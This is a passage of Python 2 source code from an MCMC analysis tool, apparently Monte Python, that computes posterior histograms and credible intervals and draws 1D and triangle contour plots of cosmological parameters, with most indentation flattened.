# two columns of a several columns file, index will vary from 0 to 1, but
# the corresponding native indices might be anything.
    # Obviously, since plotted_parameters may contain names not present in
    # some files (in case of a comparison), the native index might be
    # undefined.
    # Define the legends object, which will store the plot style, to display
# at the level of the figure
legends = [None for _ in range(len(information_instances))]
if not conf.legendnames:
legend_names = [info.basename.replace('_', ' ')
for info in information_instances]
else:
legend_names = conf.legendnames
print '-----------------------------------------------'
for index, name in enumerate(plotted_parameters):
# Adding the subplots to the respective figures, this will correspond
# to the diagonal on the triangle plot.
if conf.plot_2d:
ax2d = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
index*(len(plotted_parameters)+1)+1,
yticks=[])
if conf.plot:
ax1d = fig1d.add_subplot(
num_lines, num_columns, index+1, yticks=[])
# check for each instance if the name is part of the list of plotted
# parameters, and if yes, store the native_index. If not, store a flag
# to ignore any further plotting or computing issues concerning this
# particular instance.
for info in information_instances:
try:
info.native_index = info.ref_names.index(name)
info.ignore_param = False
standard_name = info.backup_names[info.native_index]
except ValueError:
info.ignore_param = True
# The limits might have been enforced by the user
if name in conf.force_limits.iterkeys():
x_span = conf.force_limits[name][1]-conf.force_limits[name][0]
tick_min = conf.force_limits[name][0] +0.1*x_span
tick_max = conf.force_limits[name][1] -0.1*x_span
ticks = np.linspace(tick_min,
tick_max,
info.ticknumber)
for info in information_instances:
if not info.ignore_param:
info.x_range[info.native_index] = conf.force_limits[name]
info.ticks[info.native_index] = ticks
# otherwise, find them automatically
else:
adjust_ticks(name, information_instances)
print ' -> Computing histograms for ', name
for info in information_instances:
if not info.ignore_param:
# 1D posterior normalised to P_max=1 (first step)
#
# simply the histogram from the chains, with few bins
#
info.hist, info.bin_edges = np.histogram(
info.chain[:, info.native_index+2], bins=info.bins,
weights=info.chain[:, 0], normed=False, density=False)
info.hist = info.hist/info.hist.max()
info.bincenters = 0.5*(info.bin_edges[1:]+info.bin_edges[:-1])
# 1D posterior normalised to P_max=1 (second step)
#
# returns a histogram still normalised to one, but with a ten times finer sampling;
# >> first, tries a method with spline interpolation between bin centers and extrapolation at the edges
# >> if it fails, a simpler and more robust method of linear interpolation between bin centers is used
# >> if the interpolation module is not installed, this step keeps the same posterior
#
info.interp_hist, info.interp_grid = cubic_interpolation(
info, info.hist, info.bincenters)
# minimum credible interval (method by Jan Haman). Fails for
# multimodal histograms
bounds = minimum_credible_intervals(info)
info.bounds[info.native_index] = bounds
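                # bounds[param] stores, for each confidence level, the signed
                # lower/upper offsets from the mean, later quoted as the -/+
                # errors in the plot titles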
# plotting
for info in information_instances:
if not info.ignore_param:
# 1D posterior normalised to P_max=1 (third step, used only for plotting)
#
# apply gaussian smoothing
#
# factor by which the grid has been made thinner (10 means 10 times more bins)
interpolation_factor = float(len(info.interp_grid))/float(len(info.bincenters))
# factor for gaussian smoothing
sigma = interpolation_factor*info.gaussian_smoothing
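                # sigma is expressed in bins of the finer interpolated grid, so
                # the effective smoothing scale stays equal to
                # info.gaussian_smoothing original bins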
# smooth
smoothed_interp_hist = scipy.ndimage.filters.gaussian_filter(info.interp_hist,sigma)
# re-normalised
smoothed_interp_hist = smoothed_interp_hist/smoothed_interp_hist.max()
if conf.plot_2d:
##################################################
# plot 1D posterior in diagonal of triangle plot #
##################################################
plot = ax2d.plot(
info.interp_grid,
smoothed_interp_hist,
linewidth=info.line_width, ls='-',
color = info.MP_color_cycle[info.id][1],
# the [1] picks up the color of the 68% contours
# with [0] you would get that of the 95% contours
alpha = info.alphas[info.id])
legends[info.id] = plot[0]
ax2d.set_xticks(info.ticks[info.native_index])
if conf.legend_style == 'top':
ax2d.set_title(
'%s=$%.{0}g^{{+%.{0}g}}_{{%.{0}g}}$'.format(
info.decimal) % (
info.tex_names[info.native_index],
info.mean[info.native_index],
info.bounds[info.native_index, 0, -1],
info.bounds[info.native_index, 0, 0]),
fontsize=info.fontsize)
ax2d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
elif conf.legend_style == 'sides':
# Except for the last 1d plot (bottom line), don't
# print ticks
if index == len(plotted_parameters)-1:
ax2d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
ax2d.tick_params('x',direction='inout')
ax2d.set_xlabel(
info.tex_names[info.native_index],
fontsize=info.fontsize)
else:
ax2d.set_xticklabels([])
ax2d.axis([info.x_range[info.native_index][0],
info.x_range[info.native_index][1],
0, 1.05])
if conf.plot:
if conf.short_title_1d:
ax1d.set_title(
'%s'.format(info.decimal) % (
info.tex_names[info.native_index]),
fontsize=info.fontsize)
else:
# Note the use of double curly brackets {{ }} to produce
# the desired LaTeX output. This is necessary because the
# format function would otherwise understand single
# brackets as fields.
ax1d.set_title(
'%s=$%.{0}g^{{+%.{0}g}}_{{%.{0}g}}$'.format(
info.decimal) % (
info.tex_names[info.native_index],
info.mean[info.native_index],
info.bounds[info.native_index, 0, -1],
info.bounds[info.native_index, 0, 0]),
fontsize=info.fontsize)
ax1d.set_xticks(info.ticks[info.native_index])
ax1d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
ax1d.axis([info.x_range[info.native_index][0],
info.x_range[info.native_index][1],
0, 1.05])
# Execute some customisation scripts for the 1d plots
if (info.custom1d != []):
for elem in info.custom1d:
execfile('plot_files/'+elem)
##################################################
# plot 1D posterior in 1D plot #
##################################################
ax1d.plot(
info.interp_grid,
# gaussian filtered 1d posterior:
smoothed_interp_hist,
# raw 1d posterior:
#info.interp_hist,
lw=info.line_width, ls='-',
color = info.MP_color_cycle[info.id][1],
# the [1] picks up the color of the 68% contours
# with [0] you would get that of the 95% contours
alpha = info.alphas[info.id])
# uncomment if you want to see the raw points from the histogram
                    # (to check whether the interpolation and smoothing generated artefacts)
#ax1d.plot(
# info.bincenters,
# info.hist,
# 'ro')
if conf.mean_likelihood:
for info in information_instances:
if not info.ignore_param:
try:
# 1D mean likelihood normalised to P_max=1 (first step)
#
# simply the histogram from the chains, weighted by mutiplicity*likelihood
#
lkl_mean, _ = np.histogram(
info.chain[:, info.native_index+2],
bins=info.bin_edges,
normed=False,
weights=np.exp(
conf.min_minus_lkl-info.chain[:, 1])*info.chain[:, 0])
lkl_mean /= lkl_mean.max()
# 1D mean likelihood normalised to P_max=1 (second step)
#
# returns a histogram still normalised to one, but with a ten times finer sampling;
# >> first, tries a method with spline interpolation between bin centers and extrapolation at the edges
# >> if it fails, a simpler and more robust method of linear interpolation between bin centers is used
# >> if the interpolation module is not installed, this step keeps the same posterior
#
interp_lkl_mean, interp_grid = cubic_interpolation(
info, lkl_mean, info.bincenters)
# 1D mean likelihood normalised to P_max=1 (third step, used only for plotting)
#
# apply gaussian smoothing
#
# smooth
smoothed_interp_lkl_mean = scipy.ndimage.filters.gaussian_filter(interp_lkl_mean,sigma)
# re-normalised
smoothed_interp_lkl_mean = smoothed_interp_lkl_mean/smoothed_interp_lkl_mean.max()
# Execute some customisation scripts for the 1d plots
if (info.custom1d != []):
for elem in info.custom1d:
execfile('plot_files/'+elem)
########################################################
# plot 1D mean likelihood in diagonal of triangle plot #
########################################################
if conf.plot_2d:
# raw mean likelihoods:
#ax2d.plot(info.bincenter, lkl_mean,
# ls='--', lw=conf.line_width,
# color = info.MP_color_cycle[info.id][1],
# alpha = info.alphas[info.id])
# smoothed and interpolated mean likelihoods:
ax2d.plot(interp_grid, smoothed_interp_lkl_mean,
ls='--', lw=conf.line_width,
color = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id])
########################################################
# plot 1D mean likelihood in 1D plot #
########################################################
if conf.plot:
# raw mean likelihoods:
#ax1d.plot(info.bincenters, lkl_mean,
# ls='--', lw=conf.line_width,
# color = info.MP_color_cycle[info.id][1],
# alpha = info.alphas[info.id])
# smoothed and interpolated mean likelihoods:
ax1d.plot(interp_grid, smoothed_interp_lkl_mean,
ls='--', lw=conf.line_width,
color = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id])
except:
print 'could not find likelihood contour for ',
print info.ref_parameters[info.native_index]
if conf.subplot is True:
if conf.plot_2d:
extent2d = ax2d.get_window_extent().transformed(
fig2d.dpi_scale_trans.inverted())
fig2d.savefig(os.path.join(
conf.folder, 'plots', file_name+'.'+conf.extension),
bbox_inches=extent2d.expanded(1.1, 1.4))
if conf.plot:
extent1d = ax1d.get_window_extent().transformed(
fig1d.dpi_scale_trans.inverted())
fig1d.savefig(os.path.join(
conf.folder, 'plots', file_name+'.'+conf.extension),
bbox_inches=extent1d.expanded(1.1, 1.4))
# Store the function in a file
for info in information_instances:
if not info.ignore_param:
hist_file_name = os.path.join(
info.folder, 'plots',
info.basename+'_%s.hist' % (
standard_name))
write_histogram(hist_file_name,
info.interp_grid, info.interp_hist)
# Now do the rest of the triangle plot
if conf.plot_2d:
for second_index in xrange(index):
second_name = plotted_parameters[second_index]
for info in information_instances:
if not info.ignore_param:
try:
info.native_second_index = info.ref_names.index(
plotted_parameters[second_index])
info.has_second_param = True
second_standard_name = info.backup_names[
info.native_second_index]
except ValueError:
info.has_second_param = False
else:
info.has_second_param = False
ax2dsub = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
(index)*len(plotted_parameters)+second_index+1)
for info in information_instances:
if info.has_second_param:
ax2dsub.axis([info.x_range[info.native_second_index][0],
info.x_range[info.native_second_index][1],
info.x_range[info.native_index][0],
info.x_range[info.native_index][1]])
# 2D likelihood (first step)
#
# simply the histogram from the chains, with few bins only
#
info.n, info.xedges, info.yedges = np.histogram2d(
info.chain[:, info.native_index+2],
info.chain[:, info.native_second_index+2],
weights=info.chain[:, 0],
bins=(info.bins, info.bins),
normed=False)
info.extent = [
info.x_range[info.native_second_index][0],
info.x_range[info.native_second_index][1],
info.x_range[info.native_index][0],
info.x_range[info.native_index][1]]
info.x_centers = 0.5*(info.xedges[1:]+info.xedges[:-1])
info.y_centers = 0.5*(info.yedges[1:]+info.yedges[:-1])
# 2D likelihood (second step)
#
# like for 1D, interpolate to get a finer grid
# TODO: we should not only interpolate between bin centers, but also extrapolate between side bin centers and bin edges
#
interp_y_centers = scipy.ndimage.zoom(info.y_centers,info.interpolation_smoothing, mode='reflect')
interp_x_centers = scipy.ndimage.zoom(info.x_centers,info.interpolation_smoothing, mode='reflect')
interp_likelihood = scipy.ndimage.zoom(info.n,info.interpolation_smoothing, mode='reflect')
# 2D likelihood (third step)
#
# gaussian smoothing
#
sigma = info.interpolation_smoothing*info.gaussian_smoothing
interp_smoothed_likelihood = scipy.ndimage.filters.gaussian_filter(interp_likelihood,[sigma,sigma], mode='reflect')
# Execute some customisation scripts for the 2d contour plots
if (info.custom2d != []):
for elem in info.custom2d:
execfile('plot_files/'+elem)
# plotting contours, using the ctr_level method (from Karim
# Benabed). Note that only the 1 and 2 sigma contours are
# displayed (due to the line with info.levels[:2])
try:
###########################
# plot 2D filled contours #
###########################
if not info.contours_only:
contours = ax2dsub.contourf(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent,
levels=ctr_level(
interp_smoothed_likelihood,
info.levels[:2]),
zorder=4,
colors = info.MP_color_cycle[info.id],
alpha=info.alphas[info.id])
# now add a thin darker line
# around the 95% contour
ax2dsub.contour(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent,
levels=ctr_level(
interp_smoothed_likelihood,
info.levels[1:2]),
zorder=4,
colors = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id],
linewidths=1)
###########################
# plot 2D contours #
###########################
if info.contours_only:
contours = ax2dsub.contour(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent, levels=ctr_level(
interp_smoothed_likelihood,
info.levels[:2]),
zorder=4,
colors = info.MP_color_cycle[info.id],
alpha = info.alphas[info.id],
linewidths=info.line_width)
except Warning:
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot" % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]))
except ValueError as e:
if str(e) == "Contour levels must be increasing":
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot. \n " % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]) +
'The error is: "Contour levels must be increasing"' +
" but " + str(ctr_level(info.n, info.levels[:2])) +
" were found. This may happen when most" +
" points fall in the same bin.")
else:
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot" % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]))
ax2dsub.set_xticks(info.ticks[info.native_second_index])
ax2dsub.set_yticks(info.ticks[info.native_index])
ax2dsub.tick_params('both',direction='inout',top=True,bottom=True,left=True,right=True)
if index == len(plotted_parameters)-1:
ax2dsub.set_xticklabels(
['%.{0}g'.format(info.decimal) % s for s in
info.ticks[info.native_second_index]],
fontsize=info.ticksize)
if conf.legend_style == 'sides':
ax2dsub.set_xlabel(
info.tex_names[info.native_second_index],
fontsize=info.fontsize)
else:
ax2dsub.set_xticklabels([''])
ax2dsub.set_yticks(info.ticks[info.native_index])
if second_index == 0:
ax2dsub.set_yticklabels(
['%.{0}g'.format(info.decimal) % s for s in
info.ticks[info.native_index]],
fontsize=info.ticksize)
else:
ax2dsub.set_yticklabels([''])
if conf.legend_style == 'sides':
if second_index == 0:
ax2dsub.set_ylabel(
info.tex_names[info.native_index],
fontsize=info.fontsize)
if conf.subplot is True:
# Store the individual 2d plots.
if conf.plot_2d:
area = ax2dsub.get_window_extent().transformed(
fig2d.dpi_scale_trans.inverted())
# Pad the saved area by 40% in the x-direction and 40% in
# the y-direction (matching the expanded(1.4, 1.4) call below)
fig2d.savefig(os.path.join(
conf.folder, 'plots',
file_name+'_2d_%s-%s.%s' % (
standard_name, second_standard_name,
conf.extension)),
bbox_inches=area.expanded(1.4, 1.4))
# store the coordinates of the points for further
# plotting.
store_contour_coordinates(
conf, standard_name, second_standard_name, contours)
for info in information_instances:
if not info.ignore_param and info.has_second_param:
info.hist_file_name = os.path.join(
info.folder, 'plots',
'{0}_2d_{1}-{2}.hist'.format(
info.basename,
standard_name,
second_standard_name))
write_histogram_2d(
info.hist_file_name, info.x_centers, info.y_centers,
info.extent, info.n)
print '-----------------------------------------------'
if conf.plot:
print '--> Saving figures to .{0} files'.format(info.extension)
plot_name = '-vs-'.join([os.path.split(elem.folder)[-1]
for elem in information_instances])
if conf.plot_2d:
# Legend of triangle plot
if ((conf.plot_legend_2d == None) and (len(legends) > 1)) or (conf.plot_legend_2d == True):
# Create a virtual subplot in the top right corner,
# just to be able to anchor the legend nicely
ax2d = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
len(plotted_parameters),
)
ax2d.axis('off')
try:
ax2d.legend(legends, legend_names,
loc='upper right',
borderaxespad=0.,
fontsize=info.legendsize)
except TypeError:
ax2d.legend(legends, legend_names,
loc='upper right',
borderaxespad=0.,
prop={'fontsize': info.legendsize})
fig2d.subplots_adjust(wspace=0, hspace=0)
fig2d.savefig(
os.path.join(
conf.folder, 'plots', '{0}_triangle.{1}'.format(
plot_name, info.extension)),
bbox_inches='tight')
# Legend of 1D plot
if conf.plot:
if ((conf.plot_legend_1d == None) and (len(legends) > 1)) or (conf.plot_legend_1d == True):
# no space left: add legend to the right
if len(plotted_parameters)<num_columns*num_lines:
fig1d.legend(legends, legend_names,
loc= ((num_columns-0.9)/num_columns,0.1/num_columns),
fontsize=info.legendsize)
# space left in lower right part: add legend there
else:
fig1d.legend(legends, legend_names,
loc= 'center right',
bbox_to_anchor = (1.2,0.5),
fontsize=info.legendsize)
fig1d.tight_layout()
fig1d.savefig(
os.path.join(
conf.folder, 'plots', '{0}_1d.{1}'.format(
plot_name, info.extension)),
bbox_inches='tight')
def ctr_level(histogram2d, lvl, infinite=False):
"""
Extract the contours for the 2d plots (Karim Benabed)
"""
hist = histogram2d.flatten()*1.
hist.sort()
cum_hist = np.cumsum(hist[::-1])
cum_hist /= cum_hist[-1]
alvl = np.searchsorted(cum_hist, lvl)[::-1]
clist = [0]+[hist[-i] for i in alvl]+[hist.max()]
if not infinite:
return clist[1:]
return clist
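# --- Editor's illustration (not part of the original module) ---
# ctr_level() turns a 2d histogram into the contour heights that enclose the
# requested probability mass, ready to be passed to matplotlib's contourf.
# A minimal, hypothetical usage sketch:
def _ctr_level_example():
    demo_hist, _, _ = np.histogram2d(
        np.random.randn(5000), np.random.randn(5000), bins=20)
    # heights enclosing roughly 68% and 95% of the weight, in increasing order
    return ctr_level(demo_hist, [0.68, 0.95])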
def minimum_credible_intervals(info):
"""
Extract minimum credible intervals (method from Jan Haman) FIXME
"""
histogram = info.hist
bincenters = info.bincenters
levels = info.levels
bounds = np.zeros((len(levels), 2))
j = 0
delta = bincenters[1]-bincenters[0]
left_edge = max(histogram[0] - 0.5*(histogram[1]-histogram[0]), 0.)
right_edge = max(histogram[-1] + 0.5*(histogram[-1]-histogram[-2]), 0.)
failed = False
for level in levels:
norm = float(
(np.sum(histogram)-0.5*(histogram[0]+histogram[-1]))*delta)
norm += 0.25*(left_edge+histogram[0])*delta
norm += 0.25*(right_edge+histogram[-1])*delta
water_level_up = np.max(histogram)*1.0
water_level_down = np.min(histogram)*1.0
top = 0.
iterations = 0
while (abs((top/norm)-level) > 0.0001) and not failed:
top = 0.
water_level = (water_level_up + water_level_down)/2.
#ontop = [elem for elem in histogram if elem > water_level]
indices = [i for i in range(len(histogram))
if histogram[i] > water_level]
# check for multimodal posteriors
if ((indices[-1]-indices[0]+1) != len(indices)):
warnings.warn(
"could not derive minimum credible intervals " +
"for this multimodal posterior")
warnings.warn(
"please try running longer chains or reducing " +
"the number of bins with --bins BINS (default: 20)")
failed = True
break
top = (np.sum(histogram[indices]) -
0.5*(histogram[indices[0]]+histogram[indices[-1]]))*(delta)
# left
if indices[0] > 0:
top += (0.5*(water_level+histogram[indices[0]]) *
delta*(histogram[indices[0]]-water_level) /
(histogram[indices[0]]-histogram[indices[0]-1]))
else:
if (left_edge > water_level):
top += 0.25*(left_edge+histogram[indices[0]])*delta
else:
top += (0.25*(water_level + histogram[indices[0]]) *
delta*(histogram[indices[0]]-water_level) /
(histogram[indices[0]]-left_edge))
# right
if indices[-1] < (len(histogram)-1):
top += (0.5*(water_level + histogram[indices[-1]]) *
delta*(histogram[indices[-1]]-water_level) /
(histogram[indices[-1]]-histogram[indices[-1]+1]))
else:
if (right_edge > water_level):
top += 0.25*(right_edge+histogram[indices[-1]])*delta
else:
top += (0.25*(water_level + histogram[indices[-1]]) *
delta * (histogram[indices[-1]]-water_level) /
(histogram[indices[-1]]-right_edge))
if top/norm >= level:
water_level_down = water_level
else:
water_level_up = water_level
# safeguard, just in case
iterations += 1
if (iterations > 1000):
warnings.warn(
"the loop to check for sigma deviations was " +
"taking too long to converge")
failed = True
break
# min
if failed:
bounds[j][0] = np.nan
elif indices[0] > 0:
bounds[j][0] = bincenters[indices[0]] - delta*(histogram[indices[0]]-water_level)/(histogram[indices[0]]-histogram[indices[0]-1])
else:
if (left_edge > water_level):
bounds[j][0] = bincenters[0]-0.5*delta
else:
bounds[j][0] = bincenters[indices[0]] - 0.5*delta*(histogram[indices[0]]-water_level)/(histogram[indices[0]]-left_edge)
# max
if failed:
bounds[j][1] = np.nan
elif indices[-1] < (len(histogram)-1):
bounds[j][1] = bincenters[indices[-1]] + delta*(histogram[indices[-1]]-water_level)/(histogram[indices[-1]]-histogram[indices[-1]+1])
else:
if (right_edge > water_level):
bounds[j][1] = bincenters[-1]+0.5*delta
else:
bounds[j][1] = bincenters[indices[-1]] + \
0.5*delta*(histogram[indices[-1]]-water_level) / \
(histogram[indices[-1]]-right_edge)
j += 1
for elem in bounds:
for j in (0, 1):
elem[j] -= info.mean[info.native_index]
return bounds
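# Editor's illustration (hypothetical helper, not in the original code): the
# returned bounds are offsets around the mean (see the subtraction just above),
# so the 68% credible interval of the analysed parameter is recovered as:
def _credible_interval_example(info, bounds):
    return (info.mean[info.native_index] + bounds[0, 0],
            info.mean[info.native_index] + bounds[0, 1])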
def write_h(info_file, indices, name, string, quantity, modifiers=None):
"""
Write one horizontal line of output
"""
info_file.write('\n '+name+'\t: ')
for i in indices:
info_file.write(string % quantity[i]+'\t')
def cubic_interpolation(info, hist, bincenters):
"""
Small routine to accommodate the absence of the interpolate module
"""
# we start from a try because if anything goes wrong, we want to return the raw histogram rather than nothing
try:
# test that all elements are strictly positive, otherwise we could not take the log, and we must switch to the robust method
for i,elem in enumerate(hist):
if elem == 0.:
hist[i] = 1.e-99
elif elem <0:
print hist[i]
raise Exception()
# One of our methods (using polyfit) does assume that the input histogram has a maximum value of 1.
# If in a future version this is not guaranteed anymore, we should renormalise it here.
# This is important for computing weights and thresholds.
# The threshold below which the likelihood will be
# approximated as zero is hard-coded here (could become an
# input parameter but that would not clearly be useful).
threshold = 1.e-3
# prepare the interpolation on log(Like):
ln_hist = np.log(hist)
# define a finer grid on a wider range (assuming that the following method is fine both for inter- and extra-polation)
left = max(info.boundaries[info.native_index][0],bincenters[0]-2.5*(bincenters[1]-bincenters[0]))
right = min(info.boundaries[info.native_index][1],bincenters[-1]+2.5*(bincenters[-1]-bincenters[-2]))
interp_grid = np.linspace(left, right, (len(bincenters)+4)*10+1)
######################################
# polynomial fit method (default): #
#####################################
if info.posterior_smoothing >= 2:
# the points in the histogram with a very low likelihood (i.e. hist[i]<<1, since hist is normalised to a maximum of one)
# have a lot of Poisson noise and are unreliable. However, if we do nothing, they may dominate the outcome of the fitted polynomial.
# Hence we can:
# 1) give them less weight (weight = sqrt(hist) seems to work well)
# 2) cut them at some threshold value and base the fit only on higher points
# 3) both
# the one working best seems to be 2). We also wrote 1) below, but commented it out.
# method 1):
#f = np.poly1d(np.polyfit(bincenters,ln_hist,info.posterior_smoothing,w=np.sqrt(hist)))
#interp_hist = f(interp_grid)
# method 2):
# find index values such that hist is negligible everywhere except between hist[sub_indices[0]] and hist[sub_indices[-1]]
sub_indices = [i for i,elem in enumerate(hist) if elem > threshold]
# The interpolation is done precisely in this range: hist[sub_indices[0]] < x < hist[sub_indices[-1]]
g = np.poly1d(np.polyfit(bincenters[sub_indices],ln_hist[sub_indices],info.posterior_smoothing)) #,w=np.sqrt(hist[sub_indices])))
# The extrapolation is done in a range including one more bin on each side, except when the boundary is hit
extrapolation_range_left = [info.boundaries[info.native_index][0] if sub_indices[0] == 0 else bincenters[sub_indices[0]-1]]
extrapolation_range_right = [info.boundaries[info.native_index][1] if sub_indices[-1] == len(hist)-1 else bincenters[sub_indices[-1]+1]]
# outside of this range, log(L) is brutally set to a negligible value, log(1.e-10)
interp_hist = [g(elem) if (elem > extrapolation_range_left and elem < extrapolation_range_right) else np.log(1.e-10) for elem in interp_grid]
elif info.posterior_smoothing<0:
raise io_mp.AnalyzeError(
"You passed --posterior-smoothing %d, this value is not understood"%info.posterior_smoothing)
############################################################
# other methods: #
# - linear inter/extra-polation if posterior_smoothing = 0 #
# - cubic inter/extra-polation if posterior_smoothing = 1 #
############################################################
else:
# try first inter/extra-polation
try:
# prepare to interpolate and extrapolate:
if info.posterior_smoothing == 0:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='linear', fill_value='extrapolate')
else:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='cubic', fill_value='extrapolate')
interp_hist = f(interp_grid)
# failure probably caused by old scipy not having the fill_value='extrapolate' argument. Then, only interpolate.
except:
# define a finer grid but not a wider one
left = max(info.boundaries[info.native_index][0],bincenters[0])
right = min(info.boundaries[info.native_index][1],bincenters[-1])
interp_grid = np.linspace(left, right, len(bincenters)*10+1)
# prepare to interpolate only:
if info.posterior_smoothing == 0:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='linear')
else:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='cubic')
interp_hist = f(interp_grid)
# final steps used by all methods
# go back from ln_Like to Like
interp_hist = np.exp(interp_hist)
# re-normalise the interpolated curve
interp_hist = interp_hist / interp_hist.max()
return interp_hist, interp_grid
except:
# we will end up here if anything went wrong before
# do nothing (raw histogram)
warnings.warn(
"The 1D posterior could not be processed normally, probably" +
"due to incomplete or obsolete numpy and/or scipy versions." +
"So the raw histograms will be plotted.")
return hist, bincenters
def write_histogram(hist_file_name, x_centers, hist):
"""
Store the posterior distribution to a file
"""
with open(hist_file_name, 'w') as hist_file:
hist_file.write("# 1d posterior distribution\n")
hist_file.write("\n# x_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in x_centers])+"\n")
hist_file.write("\n# Histogram\n")
hist_file.write(", ".join(
[str(elem) for elem in hist])+"\n")
print 'wrote ', hist_file_name
def read_histogram(histogram_path):
"""
Recover a stored 1d posterior
"""
with open(histogram_path, 'r') as hist_file:
for line in hist_file:
if line:
if line.find("# x_centers") != -1:
x_centers = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Histogram") != -1:
hist = [float(elem) for elem in
hist_file.next().split(",")]
x_centers = np.array(x_centers)
hist = np.array(hist)
return x_centers, hist
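# Editor's illustration (hypothetical, not part of the original module): the two
# helpers above are symmetric, so a 1d posterior can be written to disk and read
# back as a simple round trip.
def _histogram_roundtrip_example(path='example.hist'):
    centers = np.linspace(0., 1., 20)
    hist = np.exp(-0.5*((centers-0.5)/0.1)**2)
    write_histogram(path, centers, hist)
    return read_histogram(path)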
def write_histogram_2d(hist_file_name, x_centers, y_centers, extent, hist):
"""
Store the histogram information to a file, to plot it later
"""
with open(hist_file_name, 'w') as hist_file:
hist_file.write("# Interpolated histogram\n")
hist_file.write("\n# x_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in x_centers])+"\n")
hist_file.write("\n# y_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in y_centers])+"\n")
hist_file.write("\n# Extent\n")
hist_file.write(", ".join(
[str(elem) for elem in extent])+"\n")
hist_file.write("\n# Histogram\n")
for line in hist:
hist_file.write(", ".join(
[str(elem) for elem in line])+"\n")
def read_histogram_2d(histogram_path):
"""
Read the histogram information that was stored in a file.
To use it, call something like this:
.. code::
x_centers, y_centers, extent, hist = read_histogram_2d_from_file(path)
fig, ax = plt.subplots()
ax.contourf(
y_centers, x_centers, hist, extent=extent,
levels=ctr_level(hist, [0.68, 0.95]),
zorder=5, cmap=plt.cm.autumn_r)
plt.show()
"""
with open(histogram_path, 'r') as hist_file:
length = 0
for line in hist_file:
if line:
if line.find("# x_centers") != -1:
x_centers = [float(elem) for elem in
hist_file.next().split(",")]
length = len(x_centers)
elif line.find("# y_centers") != -1:
y_centers = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Extent") != -1:
extent = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Histogram") != -1:
hist = []
for index in range(length):
hist.append([float(elem) for elem in
hist_file.next().split(",")])
x_centers = np.array(x_centers)
y_centers = np.array(y_centers)
extent = np.array(extent)
hist = np.array(hist)
return x_centers, y_centers, extent, hist
def clean_conversion(module_name, tag, folder):
"""
Execute the methods "convert" from the different sampling algorithms
Returns True if something was made, False otherwise
"""
has_module = False
subfolder_name = tag+"_subfolder"
try:
module = importlib.import_module(module_name)
subfolder = getattr(module, subfolder_name)
has_module = True
except ImportError:
# The module is not installed, the conversion can not take place
pass
if has_module and os.path.isdir(folder):
# Remove any potential trailing slash
folder = os.path.join(
*[elem for elem in folder.split(os.path.sep) if elem])
if folder.split(os.path.sep)[-1] == subfolder:
try:
getattr(module, 'from_%s_output_to_chains' % tag)(folder)
except IOError:
raise io_mp.AnalyzeError(
"You asked to analyze a %s folder which " % tag +
"seems to come from an unfinished run, or to be empty " +
"or corrupt. Please make sure the run went smoothly " +
"enough.")
warnings.warn(
"The content of the %s subfolder has been " % tag +
"translated for Monte Python. Please run an "
"analysis of the entire folder now.")
return True
else:
return False
def separate_files(files):
"""
Separate the input files in folder
Given all input arguments to the command line files entry, separate them in
a list of lists, grouping them by folders. The number of identified folders
will determine the number of information instances to create
"""
final_list = []
temp = [files[0]]
folder = (os.path.dirname(files[0]) if os.path.isfile(files[0])
else files[0])
if len(files) > 1:
for elem in files[1:]:
new_folder = (os.path.dirname(elem) if os.path.isfile(elem)
else elem)
if new_folder == folder:
temp.append(elem)
else:
folder = new_folder
final_list.append(temp)
temp = [elem]
final_list.append(temp)
return final_list
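# Editor's illustration (hypothetical file names): chains coming from two
# different folders end up in two separate groups, assuming the paths exist on
# disk so that os.path.isfile() recognises them as files.
def _separate_files_example():
    files = ['run1/2021-01__1.txt', 'run1/2021-01__2.txt', 'run2/2021-01__1.txt']
    return separate_files(files) # -> [['run1/...', 'run1/...'], ['run2/...']]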
def recover_folder_and_files(files):
"""
Distinguish the cases when analyze is called with files or folder
Note that this takes place chronologically after the function
`separate_files`"""
# The following list defines the substring that a chain should contain for
# the code to recognise it as a proper chain.
substrings = ['.txt', '__']
# The following variable defines the substring that identifies error_log
# files, which therefore must not be taken into account in the analysis.
substring_err = 'error_log'
limit = 10
# If the first element is a folder, grab all chain files inside
if os.path.isdir(files[0]):
folder = os.path.normpath(files[0])
files = [os.path.join(folder, elem) for elem in os.listdir(folder)
if not os.path.isdir(os.path.join(folder, elem))
and not os.path.getsize(os.path.join(folder, elem)) < limit
and (substring_err not in elem)
and all([x in elem for x in substrings])]
# Otherwise, extract the folder from the chain file-name.
else:
# If the name is completely wrong, say it
if not os.path.exists(files[0]):
raise io_mp.AnalyzeError(
"You provided a non-existant folder/file to analyze")
folder = os.path.relpath(
os.path.dirname(os.path.realpath(files[0])), os.path.curdir)
files = [os.path.join(folder, elem) for elem in os.listdir(folder)
if os.path.join(folder, elem) in np.copy(files)
and not os.path.isdir(os.path.join(folder, elem))
and not os.path.getsize(os.path.join(folder, elem)) < limit
